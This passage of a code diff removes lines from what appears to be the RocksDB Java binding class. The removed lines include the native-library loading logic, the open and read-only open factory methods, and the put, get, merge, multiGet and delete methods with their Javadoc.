-          success = true;
-          break;
-        } catch (UnsatisfiedLinkError e) {
-          err = e;
-        }
-      }
-      if (!success) {
-        libraryLoaded.set(LibraryState.NOT_LOADED);
-        throw err;
-      }
-
-      libraryLoaded.set(LibraryState.LOADED);
-      return;
-    }
-
-    while (libraryLoaded.get() == LibraryState.LOADING) {
-      try {
-        Thread.sleep(10);
-      } catch(final InterruptedException e) {
-        //ignore
-      }
-    }
-  }
-
-  /**
-   * The factory constructor of RocksDB that opens a RocksDB instance given
-   * the path to the database using the default options w/ createIfMissing
-   * set to true.
-   *
-   * @param path the path to the rocksdb.
-   * @return a {@link RocksDB} instance on success, null if the specified
-   *     {@link RocksDB} can not be opened.
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   * @see Options#setCreateIfMissing(boolean)
-   */
-  public static RocksDB open(final String path) throws RocksDBException {
-    // This allows to use the rocksjni default Options instead of
-    // the c++ one.
-    Options options = new Options();
-    options.setCreateIfMissing(true);
-    return open(options, path);
-  }
-
-  /**
-   * The factory constructor of RocksDB that opens a RocksDB instance given
-   * the path to the database using the specified options and db path and a list
-   * of column family names.
-   * <p>
-   * If opened in read write mode every existing column family name must be
-   * passed within the list to this method.</p>
-   * <p>
-   * If opened in read-only mode only a subset of existing column families must
-   * be passed to this method.</p>
-   * <p>
-   * Options instance *should* not be disposed before all DBs using this options
-   * instance have been closed. If user doesn't call options dispose explicitly,
-   * then this options instance will be GC'd automatically</p>
-   * <p>
-   * ColumnFamily handles are disposed when the RocksDB instance is disposed.
-   * </p>
-   *
-   * @param path the path to the rocksdb.
-   * @param columnFamilyDescriptors list of column family descriptors
-   * @param columnFamilyHandles will be filled with ColumnFamilyHandle instances
-   *     on open.
-   * @return a {@link RocksDB} instance on success, null if the specified
-   *     {@link RocksDB} can not be opened.
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   * @see DBOptions#setCreateIfMissing(boolean)
-   */
-  public static RocksDB open(final String path,
-      final List<ColumnFamilyDescriptor> columnFamilyDescriptors,
-      final List<ColumnFamilyHandle> columnFamilyHandles)
-      throws RocksDBException {
-    // This allows to use the rocksjni default Options instead of
-    // the c++ one.
-    DBOptions options = new DBOptions();
-    return open(options, path, columnFamilyDescriptors, columnFamilyHandles);
-  }
-
-  /**
-   * The factory constructor of RocksDB that opens a RocksDB instance given
-   * the path to the database using the specified options and db path.
-   *
-   * <p>
-   * Options instance *should* not be disposed before all DBs using this options
-   * instance have been closed. If user doesn't call options dispose explicitly,
-   * then this options instance will be GC'd automatically.</p>
-   * <p>
-   * Options instance can be re-used to open multiple DBs if DB statistics is
-   * not used. If DB statistics are required, then its recommended to open DB
-   * with new Options instance as underlying native statistics instance does not
-   * use any locks to prevent concurrent updates.</p>
-   *
-   * @param options {@link org.rocksdb.Options} instance.
-   * @param path the path to the rocksdb.
-   * @return a {@link RocksDB} instance on success, null if the specified
-   *     {@link RocksDB} can not be opened.
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   *
-   * @see Options#setCreateIfMissing(boolean)
-   */
-  public static RocksDB open(final Options options, final String path)
-      throws RocksDBException {
-    // when non-default Options is used, keeping an Options reference
-    // in RocksDB can prevent Java to GC during the life-time of
-    // the currently-created RocksDB.
-    final RocksDB db = new RocksDB(open(options.nativeHandle_, path));
-    db.storeOptionsInstance(options);
-    return db;
-  }
-
-  /**
-   * The factory constructor of RocksDB that opens a RocksDB instance given
-   * the path to the database using the specified options and db path and a list
-   * of column family names.
-   * <p>
-   * If opened in read write mode every existing column family name must be
-   * passed within the list to this method.</p>
-   * <p>
-   * If opened in read-only mode only a subset of existing column families must
-   * be passed to this method.</p>
-   * <p>
-   * Options instance *should* not be disposed before all DBs using this options
-   * instance have been closed. If user doesn't call options dispose explicitly,
-   * then this options instance will be GC'd automatically.</p>
-   * <p>
-   * Options instance can be re-used to open multiple DBs if DB statistics is
-   * not used. If DB statistics are required, then its recommended to open DB
-   * with new Options instance as underlying native statistics instance does not
-   * use any locks to prevent concurrent updates.</p>
-   * <p>
-   * ColumnFamily handles are disposed when the RocksDB instance is disposed.
-   * </p>
-   *
-   * @param options {@link org.rocksdb.DBOptions} instance.
-   * @param path the path to the rocksdb.
-   * @param columnFamilyDescriptors list of column family descriptors
-   * @param columnFamilyHandles will be filled with ColumnFamilyHandle instances
-   *     on open.
-   * @return a {@link RocksDB} instance on success, null if the specified
-   *     {@link RocksDB} can not be opened.
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   *
-   * @see DBOptions#setCreateIfMissing(boolean)
-   */
-  public static RocksDB open(final DBOptions options, final String path,
-      final List<ColumnFamilyDescriptor> columnFamilyDescriptors,
-      final List<ColumnFamilyHandle> columnFamilyHandles)
-      throws RocksDBException {
-
-    final byte[][] cfNames = new byte[columnFamilyDescriptors.size()][];
-    final long[] cfOptionHandles = new long[columnFamilyDescriptors.size()];
-    for (int i = 0; i < columnFamilyDescriptors.size(); i++) {
-      final ColumnFamilyDescriptor cfDescriptor = columnFamilyDescriptors
-          .get(i);
-      cfNames[i] = cfDescriptor.columnFamilyName();
-      cfOptionHandles[i] = cfDescriptor.columnFamilyOptions().nativeHandle_;
-    }
-
-    final long[] handles = open(options.nativeHandle_, path, cfNames,
-        cfOptionHandles);
-    final RocksDB db = new RocksDB(handles[0]);
-    db.storeOptionsInstance(options);
-
-    for (int i = 1; i < handles.length; i++) {
-      columnFamilyHandles.add(new ColumnFamilyHandle(db, handles[i]));
-    }
-
-    return db;
-  }
-
-  /**
-   * The factory constructor of RocksDB that opens a RocksDB instance in
-   * Read-Only mode given the path to the database using the default
-   * options.
-   *
-   * @param path the path to the RocksDB.
-   * @return a {@link RocksDB} instance on success, null if the specified
-   *     {@link RocksDB} can not be opened.
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   */
-  public static RocksDB openReadOnly(final String path)
-      throws RocksDBException {
-    // This allows to use the rocksjni default Options instead of
-    // the c++ one.
-    Options options = new Options();
-    return openReadOnly(options, path);
-  }
-
-  /**
-   * The factory constructor of RocksDB that opens a RocksDB instance in
-   * Read-Only mode given the path to the database using the default
-   * options.
-   *
-   * @param path the path to the RocksDB.
-   * @param columnFamilyDescriptors list of column family descriptors
-   * @param columnFamilyHandles will be filled with ColumnFamilyHandle instances
-   *     on open.
-   * @return a {@link RocksDB} instance on success, null if the specified
-   *     {@link RocksDB} can not be opened.
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   */
-  public static RocksDB openReadOnly(final String path,
-      final List<ColumnFamilyDescriptor> columnFamilyDescriptors,
-      final List<ColumnFamilyHandle> columnFamilyHandles)
-      throws RocksDBException {
-    // This allows to use the rocksjni default Options instead of
-    // the c++ one.
-    final DBOptions options = new DBOptions();
-    return openReadOnly(options, path, columnFamilyDescriptors,
-        columnFamilyHandles);
-  }
-
-  /**
-   * The factory constructor of RocksDB that opens a RocksDB instance in
-   * Read-Only mode given the path to the database using the specified
-   * options and db path.
-   *
-   * Options instance *should* not be disposed before all DBs using this options
-   * instance have been closed. If user doesn't call options dispose explicitly,
-   * then this options instance will be GC'd automatically.
-   *
-   * @param options {@link Options} instance.
-   * @param path the path to the RocksDB.
-   * @return a {@link RocksDB} instance on success, null if the specified
-   *     {@link RocksDB} can not be opened.
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   */
-  public static RocksDB openReadOnly(final Options options, final String path)
-      throws RocksDBException {
-    // when non-default Options is used, keeping an Options reference
-    // in RocksDB can prevent Java to GC during the life-time of
-    // the currently-created RocksDB.
-    final RocksDB db = new RocksDB(openROnly(options.nativeHandle_, path));
-    db.storeOptionsInstance(options);
-    return db;
-  }
-
-  /**
-   * The factory constructor of RocksDB that opens a RocksDB instance in
-   * Read-Only mode given the path to the database using the specified
-   * options and db path.
-   *
-   * <p>This open method allows to open RocksDB using a subset of available
-   * column families</p>
-   * <p>Options instance *should* not be disposed before all DBs using this
-   * options instance have been closed. If user doesn't call options dispose
-   * explicitly,then this options instance will be GC'd automatically.</p>
-   *
-   * @param options {@link DBOptions} instance.
-   * @param path the path to the RocksDB.
-   * @param columnFamilyDescriptors list of column family descriptors
-   * @param columnFamilyHandles will be filled with ColumnFamilyHandle instances
-   *     on open.
-   * @return a {@link RocksDB} instance on success, null if the specified
-   *     {@link RocksDB} can not be opened.
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   */
-  public static RocksDB openReadOnly(final DBOptions options, final String path,
-      final List<ColumnFamilyDescriptor> columnFamilyDescriptors,
-      final List<ColumnFamilyHandle> columnFamilyHandles)
-      throws RocksDBException {
-    // when non-default Options is used, keeping an Options reference
-    // in RocksDB can prevent Java to GC during the life-time of
-    // the currently-created RocksDB.
-
-    final byte[][] cfNames = new byte[columnFamilyDescriptors.size()][];
-    final long[] cfOptionHandles = new long[columnFamilyDescriptors.size()];
-    for (int i = 0; i < columnFamilyDescriptors.size(); i++) {
-      final ColumnFamilyDescriptor cfDescriptor = columnFamilyDescriptors
-          .get(i);
-      cfNames[i] = cfDescriptor.columnFamilyName();
-      cfOptionHandles[i] = cfDescriptor.columnFamilyOptions().nativeHandle_;
-    }
-
-    final long[] handles = openROnly(options.nativeHandle_, path, cfNames,
-        cfOptionHandles);
-    final RocksDB db = new RocksDB(handles[0]);
-    db.storeOptionsInstance(options);
-
-    for (int i = 1; i < handles.length; i++) {
-      columnFamilyHandles.add(new ColumnFamilyHandle(db, handles[i]));
-    }
-
-    return db;
-  }
-  /**
-   * Static method to determine all available column families for a
-   * rocksdb database identified by path
-   *
-   * @param options Options for opening the database
-   * @param path Absolute path to rocksdb database
-   * @return List&lt;byte[]&gt; List containing the column family names
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   */
-  public static List<byte[]> listColumnFamilies(final Options options,
-      final String path) throws RocksDBException {
-    return Arrays.asList(RocksDB.listColumnFamilies(options.nativeHandle_,
-        path));
-  }
-
-  private void storeOptionsInstance(DBOptionsInterface options) {
-    options_ = options;
-  }
-
-  /**
-   * Set the database entry for "key" to "value".
-   *
-   * @param key the specified key to be inserted.
-   * @param value the value associated with the specified key.
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   */
-  public void put(final byte[] key, final byte[] value)
-      throws RocksDBException {
-    put(nativeHandle_, key, 0, key.length, value, 0, value.length);
-  }
-
-  /**
-   * Set the database entry for "key" to "value" in the specified
-   * column family.
-   *
-   * @param columnFamilyHandle {@link org.rocksdb.ColumnFamilyHandle}
-   *     instance
-   * @param key the specified key to be inserted.
-   * @param value the value associated with the specified key.
-   *
-   * throws IllegalArgumentException if column family is not present
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   */
-  public void put(final ColumnFamilyHandle columnFamilyHandle,
-      final byte[] key, final byte[] value) throws RocksDBException {
-    put(nativeHandle_, key, 0, key.length, value, 0, value.length,
-        columnFamilyHandle.nativeHandle_);
-  }
-
-  /**
-   * Set the database entry for "key" to "value".
-   *
-   * @param writeOpts {@link org.rocksdb.WriteOptions} instance.
-   * @param key the specified key to be inserted.
-   * @param value the value associated with the specified key.
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   */
-  public void put(final WriteOptions writeOpts, final byte[] key,
-      final byte[] value) throws RocksDBException {
-    put(nativeHandle_, writeOpts.nativeHandle_,
-        key, 0, key.length, value, 0, value.length);
-  }
-
-  /**
-   * Set the database entry for "key" to "value" for the specified
-   * column family.
-   *
-   * @param columnFamilyHandle {@link org.rocksdb.ColumnFamilyHandle}
-   *     instance
-   * @param writeOpts {@link org.rocksdb.WriteOptions} instance.
-   * @param key the specified key to be inserted.
-   * @param value the value associated with the specified key.
-   *
-   * throws IllegalArgumentException if column family is not present
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   * @see IllegalArgumentException
-   */
-  public void put(final ColumnFamilyHandle columnFamilyHandle,
-      final WriteOptions writeOpts, final byte[] key,
-      final byte[] value) throws RocksDBException {
-    put(nativeHandle_, writeOpts.nativeHandle_, key, 0, key.length, value,
-        0, value.length, columnFamilyHandle.nativeHandle_);
-  }
-
-  /**
-   * If the key definitely does not exist in the database, then this method
-   * returns false, else true.
-   *
-   * This check is potentially lighter-weight than invoking DB::Get(). One way
-   * to make this lighter weight is to avoid doing any IOs.
-   *
-   * @param key byte array of a key to search for
-   * @param value StringBuilder instance which is a out parameter if a value is
-   *    found in block-cache.
-   * @return boolean value indicating if key does not exist or might exist.
-   */
-  public boolean keyMayExist(final byte[] key, final StringBuilder value) {
-    return keyMayExist(nativeHandle_, key, 0, key.length, value);
-  }
-
-  /**
-   * If the key definitely does not exist in the database, then this method
-   * returns false, else true.
-   *
-   * This check is potentially lighter-weight than invoking DB::Get(). One way
-   * to make this lighter weight is to avoid doing any IOs.
-   *
-   * @param columnFamilyHandle {@link ColumnFamilyHandle} instance
-   * @param key byte array of a key to search for
-   * @param value StringBuilder instance which is a out parameter if a value is
-   *    found in block-cache.
-   * @return boolean value indicating if key does not exist or might exist.
-   */
-  public boolean keyMayExist(final ColumnFamilyHandle columnFamilyHandle,
-      final byte[] key, final StringBuilder value) {
-    return keyMayExist(nativeHandle_, key, 0, key.length,
-        columnFamilyHandle.nativeHandle_, value);
-  }
-
-  /**
-   * If the key definitely does not exist in the database, then this method
-   * returns false, else true.
-   *
-   * This check is potentially lighter-weight than invoking DB::Get(). One way
-   * to make this lighter weight is to avoid doing any IOs.
-   *
-   * @param readOptions {@link ReadOptions} instance
-   * @param key byte array of a key to search for
-   * @param value StringBuilder instance which is a out parameter if a value is
-   *    found in block-cache.
-   * @return boolean value indicating if key does not exist or might exist.
-   */
-  public boolean keyMayExist(final ReadOptions readOptions,
-      final byte[] key, final StringBuilder value) {
-    return keyMayExist(nativeHandle_, readOptions.nativeHandle_,
-        key, 0, key.length, value);
-  }
-
-  /**
-   * If the key definitely does not exist in the database, then this method
-   * returns false, else true.
-   *
-   * This check is potentially lighter-weight than invoking DB::Get(). One way
-   * to make this lighter weight is to avoid doing any IOs.
-   *
-   * @param readOptions {@link ReadOptions} instance
-   * @param columnFamilyHandle {@link ColumnFamilyHandle} instance
-   * @param key byte array of a key to search for
-   * @param value StringBuilder instance which is a out parameter if a value is
-   *    found in block-cache.
-   * @return boolean value indicating if key does not exist or might exist.
-   */
-  public boolean keyMayExist(final ReadOptions readOptions,
-      final ColumnFamilyHandle columnFamilyHandle, final byte[] key,
-      final StringBuilder value) {
-    return keyMayExist(nativeHandle_, readOptions.nativeHandle_,
-        key, 0, key.length, columnFamilyHandle.nativeHandle_,
-        value);
-  }
-
-  /**
-   * Apply the specified updates to the database.
-   *
-   * @param writeOpts WriteOptions instance
-   * @param updates WriteBatch instance
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   */
-  public void write(final WriteOptions writeOpts, final WriteBatch updates)
-      throws RocksDBException {
-    write0(nativeHandle_, writeOpts.nativeHandle_, updates.nativeHandle_);
-  }
-
-  /**
-   * Apply the specified updates to the database.
-   *
-   * @param writeOpts WriteOptions instance
-   * @param updates WriteBatchWithIndex instance
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   */
-  public void write(final WriteOptions writeOpts,
-      final WriteBatchWithIndex updates) throws RocksDBException {
-    write1(nativeHandle_, writeOpts.nativeHandle_, updates.nativeHandle_);
-  }
-
-  /**
-   * Add merge operand for key/value pair.
-   *
-   * @param key the specified key to be merged.
-   * @param value the value to be merged with the current value for
-   * the specified key.
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   */
-  public void merge(final byte[] key, final byte[] value)
-      throws RocksDBException {
-    merge(nativeHandle_, key, 0, key.length, value, 0, value.length);
-  }
-
-  /**
-   * Add merge operand for key/value pair in a ColumnFamily.
-   *
-   * @param columnFamilyHandle {@link ColumnFamilyHandle} instance
-   * @param key the specified key to be merged.
-   * @param value the value to be merged with the current value for
-   * the specified key.
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   */
-  public void merge(final ColumnFamilyHandle columnFamilyHandle,
-      final byte[] key, final byte[] value) throws RocksDBException {
-    merge(nativeHandle_, key, 0, key.length, value, 0, value.length,
-        columnFamilyHandle.nativeHandle_);
-  }
-
-  /**
-   * Add merge operand for key/value pair.
-   *
-   * @param writeOpts {@link WriteOptions} for this write.
-   * @param key the specified key to be merged.
-   * @param value the value to be merged with the current value for
-   * the specified key.
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   */
-  public void merge(final WriteOptions writeOpts, final byte[] key,
-      final byte[] value) throws RocksDBException {
-    merge(nativeHandle_, writeOpts.nativeHandle_,
-        key, 0, key.length, value, 0, value.length);
-  }
-
-  /**
-   * Add merge operand for key/value pair.
-   *
-   * @param columnFamilyHandle {@link ColumnFamilyHandle} instance
-   * @param writeOpts {@link WriteOptions} for this write.
-   * @param key the specified key to be merged.
-   * @param value the value to be merged with the current value for
-   * the specified key.
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   */
-  public void merge(final ColumnFamilyHandle columnFamilyHandle,
-      final WriteOptions writeOpts, final byte[] key,
-      final byte[] value) throws RocksDBException {
-    merge(nativeHandle_, writeOpts.nativeHandle_,
-        key, 0, key.length, value, 0, value.length,
-        columnFamilyHandle.nativeHandle_);
-  }
-
-  // TODO(AR) we should improve the #get() API, returning -1 (RocksDB.NOT_FOUND) is not very nice
-  // when we could communicate better status into, also the C++ code show that -2 could be returned
-
-  /**
-   * Get the value associated with the specified key within column family*
-   * @param key the key to retrieve the value.
-   * @param value the out-value to receive the retrieved value.
-   * @return The size of the actual value that matches the specified
-   *     {@code key} in byte.  If the return value is greater than the
-   *     length of {@code value}, then it indicates that the size of the
-   *     input buffer {@code value} is insufficient and partial result will
-   *     be returned.  RocksDB.NOT_FOUND will be returned if the value not
-   *     found.
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   */
-  public int get(final byte[] key, final byte[] value) throws RocksDBException {
-    return get(nativeHandle_, key, 0, key.length, value, 0, value.length);
-  }
-
-  /**
-   * Get the value associated with the specified key within column family.
-   *
-   * @param columnFamilyHandle {@link org.rocksdb.ColumnFamilyHandle}
-   *     instance
-   * @param key the key to retrieve the value.
-   * @param value the out-value to receive the retrieved value.
-   * @return The size of the actual value that matches the specified
-   *     {@code key} in byte.  If the return value is greater than the
-   *     length of {@code value}, then it indicates that the size of the
-   *     input buffer {@code value} is insufficient and partial result will
-   *     be returned.  RocksDB.NOT_FOUND will be returned if the value not
-   *     found.
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   */
-  public int get(final ColumnFamilyHandle columnFamilyHandle, final byte[] key,
-      final byte[] value) throws RocksDBException, IllegalArgumentException {
-    return get(nativeHandle_, key, 0, key.length, value, 0, value.length,
-        columnFamilyHandle.nativeHandle_);
-  }
-
-  /**
-   * Get the value associated with the specified key.
-   *
-   * @param opt {@link org.rocksdb.ReadOptions} instance.
-   * @param key the key to retrieve the value.
-   * @param value the out-value to receive the retrieved value.
-   * @return The size of the actual value that matches the specified
-   *     {@code key} in byte.  If the return value is greater than the
-   *     length of {@code value}, then it indicates that the size of the
-   *     input buffer {@code value} is insufficient and partial result will
-   *     be returned.  RocksDB.NOT_FOUND will be returned if the value not
-   *     found.
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   */
-  public int get(final ReadOptions opt, final byte[] key,
-      final byte[] value) throws RocksDBException {
-    return get(nativeHandle_, opt.nativeHandle_,
-               key, 0, key.length, value, 0, value.length);
-  }
-  /**
-   * Get the value associated with the specified key within column family.
-   *
-   * @param columnFamilyHandle {@link org.rocksdb.ColumnFamilyHandle}
-   *     instance
-   * @param opt {@link org.rocksdb.ReadOptions} instance.
-   * @param key the key to retrieve the value.
-   * @param value the out-value to receive the retrieved value.
-   * @return The size of the actual value that matches the specified
-   *     {@code key} in byte.  If the return value is greater than the
-   *     length of {@code value}, then it indicates that the size of the
-   *     input buffer {@code value} is insufficient and partial result will
-   *     be returned.  RocksDB.NOT_FOUND will be returned if the value not
-   *     found.
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   */
-  public int get(final ColumnFamilyHandle columnFamilyHandle,
-      final ReadOptions opt, final byte[] key, final byte[] value)
-      throws RocksDBException {
-    return get(nativeHandle_, opt.nativeHandle_, key, 0, key.length, value,
-        0, value.length, columnFamilyHandle.nativeHandle_);
-  }
-
-  /**
-   * The simplified version of get which returns a new byte array storing
-   * the value associated with the specified input key if any.  null will be
-   * returned if the specified key is not found.
-   *
-   * @param key the key retrieve the value.
-   * @return a byte array storing the value associated with the input key if
-   *     any.  null if it does not find the specified key.
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   */
-  public byte[] get(final byte[] key) throws RocksDBException {
-    return get(nativeHandle_, key, 0, key.length);
-  }
-
-  /**
-   * The simplified version of get which returns a new byte array storing
-   * the value associated with the specified input key if any.  null will be
-   * returned if the specified key is not found.
-   *
-   * @param columnFamilyHandle {@link org.rocksdb.ColumnFamilyHandle}
-   *     instance
-   * @param key the key retrieve the value.
-   * @return a byte array storing the value associated with the input key if
-   *     any.  null if it does not find the specified key.
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   */
-  public byte[] get(final ColumnFamilyHandle columnFamilyHandle,
-      final byte[] key) throws RocksDBException {
-    return get(nativeHandle_, key, 0, key.length,
-        columnFamilyHandle.nativeHandle_);
-  }
-
-  /**
-   * The simplified version of get which returns a new byte array storing
-   * the value associated with the specified input key if any.  null will be
-   * returned if the specified key is not found.
-   *
-   * @param key the key retrieve the value.
-   * @param opt Read options.
-   * @return a byte array storing the value associated with the input key if
-   *     any.  null if it does not find the specified key.
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   */
-  public byte[] get(final ReadOptions opt, final byte[] key)
-      throws RocksDBException {
-    return get(nativeHandle_, opt.nativeHandle_, key, 0, key.length);
-  }
-
-  /**
-   * The simplified version of get which returns a new byte array storing
-   * the value associated with the specified input key if any.  null will be
-   * returned if the specified key is not found.
-   *
-   * @param columnFamilyHandle {@link org.rocksdb.ColumnFamilyHandle}
-   *     instance
-   * @param key the key retrieve the value.
-   * @param opt Read options.
-   * @return a byte array storing the value associated with the input key if
-   *     any.  null if it does not find the specified key.
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   */
-  public byte[] get(final ColumnFamilyHandle columnFamilyHandle,
-      final ReadOptions opt, final byte[] key) throws RocksDBException {
-    return get(nativeHandle_, opt.nativeHandle_, key, 0, key.length,
-        columnFamilyHandle.nativeHandle_);
-  }
-
-  /**
-   * Returns a map of keys for which values were found in DB.
-   *
-   * @param keys List of keys for which values need to be retrieved.
-   * @return Map where key of map is the key passed by user and value for map
-   * entry is the corresponding value in DB.
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   */
-  public Map<byte[], byte[]> multiGet(final List<byte[]> keys)
-      throws RocksDBException {
-    assert(keys.size() != 0);
-
-    final byte[][] keysArray = keys.toArray(new byte[keys.size()][]);
-    final int keyOffsets[] = new int[keysArray.length];
-    final int keyLengths[] = new int[keysArray.length];
-    for(int i = 0; i < keyLengths.length; i++) {
-      keyLengths[i] = keysArray[i].length;
-    }
-
-    final byte[][] values = multiGet(nativeHandle_, keysArray, keyOffsets,
-        keyLengths);
-
-    final Map<byte[], byte[]> keyValueMap =
-        new HashMap<>(computeCapacityHint(values.length));
-    for(int i = 0; i < values.length; i++) {
-      if(values[i] == null) {
-        continue;
-      }
-
-      keyValueMap.put(keys.get(i), values[i]);
-    }
-
-    return keyValueMap;
-  }
-
-  private static int computeCapacityHint(final int estimatedNumberOfItems) {
-    // Default load factor for HashMap is 0.75, so N * 1.5 will be at the load
-    // limit. We add +1 for a buffer.
-    return (int)Math.ceil(estimatedNumberOfItems * 1.5 + 1.0);
-  }
-
-  /**
-   * Returns a map of keys for which values were found in DB.
-   * <p>
-   * Note: Every key needs to have a related column family name in
-   * {@code columnFamilyHandleList}.
-   * </p>
-   *
-   * @param columnFamilyHandleList {@link java.util.List} containing
-   *     {@link org.rocksdb.ColumnFamilyHandle} instances.
-   * @param keys List of keys for which values need to be retrieved.
-   * @return Map where key of map is the key passed by user and value for map
-   * entry is the corresponding value in DB.
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   * @throws IllegalArgumentException thrown if the size of passed keys is not
-   *    equal to the amount of passed column family handles.
-   */
-  public Map<byte[], byte[]> multiGet(
-      final List<ColumnFamilyHandle> columnFamilyHandleList,
-      final List<byte[]> keys) throws RocksDBException,
-      IllegalArgumentException {
-    assert(keys.size() != 0);
-    // Check if key size equals cfList size. If not a exception must be
-    // thrown. If not a Segmentation fault happens.
-    if (keys.size() != columnFamilyHandleList.size()) {
-        throw new IllegalArgumentException(
-            "For each key there must be a ColumnFamilyHandle.");
-    }
-    final long[] cfHandles = new long[columnFamilyHandleList.size()];
-    for (int i = 0; i < columnFamilyHandleList.size(); i++) {
-      cfHandles[i] = columnFamilyHandleList.get(i).nativeHandle_;
-    }
-
-    final byte[][] keysArray = keys.toArray(new byte[keys.size()][]);
-    final int keyOffsets[] = new int[keysArray.length];
-    final int keyLengths[] = new int[keysArray.length];
-    for(int i = 0; i < keyLengths.length; i++) {
-      keyLengths[i] = keysArray[i].length;
-    }
-
-    final byte[][] values = multiGet(nativeHandle_, keysArray, keyOffsets,
-        keyLengths, cfHandles);
-
-    final Map<byte[], byte[]> keyValueMap =
-        new HashMap<>(computeCapacityHint(values.length));
-    for(int i = 0; i < values.length; i++) {
-      if (values[i] == null) {
-        continue;
-      }
-      keyValueMap.put(keys.get(i), values[i]);
-    }
-    return keyValueMap;
-  }
-
-  /**
-   * Returns a map of keys for which values were found in DB.
-   *
-   * @param opt Read options.
-   * @param keys of keys for which values need to be retrieved.
-   * @return Map where key of map is the key passed by user and value for map
-   * entry is the corresponding value in DB.
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   */
-  public Map<byte[], byte[]> multiGet(final ReadOptions opt,
-      final List<byte[]> keys) throws RocksDBException {
-    assert(keys.size() != 0);
-
-    final byte[][] keysArray = keys.toArray(new byte[keys.size()][]);
-    final int keyOffsets[] = new int[keysArray.length];
-    final int keyLengths[] = new int[keysArray.length];
-    for(int i = 0; i < keyLengths.length; i++) {
-      keyLengths[i] = keysArray[i].length;
-    }
-
-    final byte[][] values = multiGet(nativeHandle_, opt.nativeHandle_,
-        keysArray, keyOffsets, keyLengths);
-
-    final Map<byte[], byte[]> keyValueMap =
-        new HashMap<>(computeCapacityHint(values.length));
-    for(int i = 0; i < values.length; i++) {
-      if(values[i] == null) {
-        continue;
-      }
-
-      keyValueMap.put(keys.get(i), values[i]);
-    }
-
-    return keyValueMap;
-  }
-
-  /**
-   * Returns a map of keys for which values were found in DB.
-   * <p>
-   * Note: Every key needs to have a related column family name in
-   * {@code columnFamilyHandleList}.
-   * </p>
-   *
-   * @param opt Read options.
-   * @param columnFamilyHandleList {@link java.util.List} containing
-   *     {@link org.rocksdb.ColumnFamilyHandle} instances.
-   * @param keys of keys for which values need to be retrieved.
-   * @return Map where key of map is the key passed by user and value for map
-   * entry is the corresponding value in DB.
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   * @throws IllegalArgumentException thrown if the size of passed keys is not
-   *    equal to the amount of passed column family handles.
-   */
-  public Map<byte[], byte[]> multiGet(final ReadOptions opt,
-      final List<ColumnFamilyHandle> columnFamilyHandleList,
-      final List<byte[]> keys) throws RocksDBException {
-    assert(keys.size() != 0);
-    // Check if key size equals cfList size. If not a exception must be
-    // thrown. If not a Segmentation fault happens.
-    if (keys.size()!=columnFamilyHandleList.size()){
-      throw new IllegalArgumentException(
-          "For each key there must be a ColumnFamilyHandle.");
-    }
-    final long[] cfHandles = new long[columnFamilyHandleList.size()];
-    for (int i = 0; i < columnFamilyHandleList.size(); i++) {
-      cfHandles[i] = columnFamilyHandleList.get(i).nativeHandle_;
-    }
-
-    final byte[][] keysArray = keys.toArray(new byte[keys.size()][]);
-    final int keyOffsets[] = new int[keysArray.length];
-    final int keyLengths[] = new int[keysArray.length];
-    for(int i = 0; i < keyLengths.length; i++) {
-      keyLengths[i] = keysArray[i].length;
-    }
-
-    final byte[][] values = multiGet(nativeHandle_, opt.nativeHandle_,
-        keysArray, keyOffsets, keyLengths, cfHandles);
-
-    final Map<byte[], byte[]> keyValueMap
-        = new HashMap<>(computeCapacityHint(values.length));
-    for(int i = 0; i < values.length; i++) {
-      if(values[i] == null) {
-        continue;
-      }
-      keyValueMap.put(keys.get(i), values[i]);
-    }
-
-    return keyValueMap;
-  }
-
-  /**
-   * Remove the database entry (if any) for "key".  Returns OK on
-   * success, and a non-OK status on error.  It is not an error if "key"
-   * did not exist in the database.
-   *
-   * @param key Key to delete within database
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   *
-   * @deprecated Use {@link #delete(byte[])}
-   */
-  @Deprecated
-  public void remove(final byte[] key) throws RocksDBException {
-    delete(key);
-  }
-
-  /**
-   * Delete the database entry (if any) for "key".  Returns OK on
-   * success, and a non-OK status on error.  It is not an error if "key"
-   * did not exist in the database.
-   *
-   * @param key Key to delete within database
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   */
-  public void delete(final byte[] key) throws RocksDBException {
-    delete(nativeHandle_, key, 0, key.length);
-  }
-
-  /**
-   * Remove the database entry (if any) for "key".  Returns OK on
-   * success, and a non-OK status on error.  It is not an error if "key"
-   * did not exist in the database.
-   *
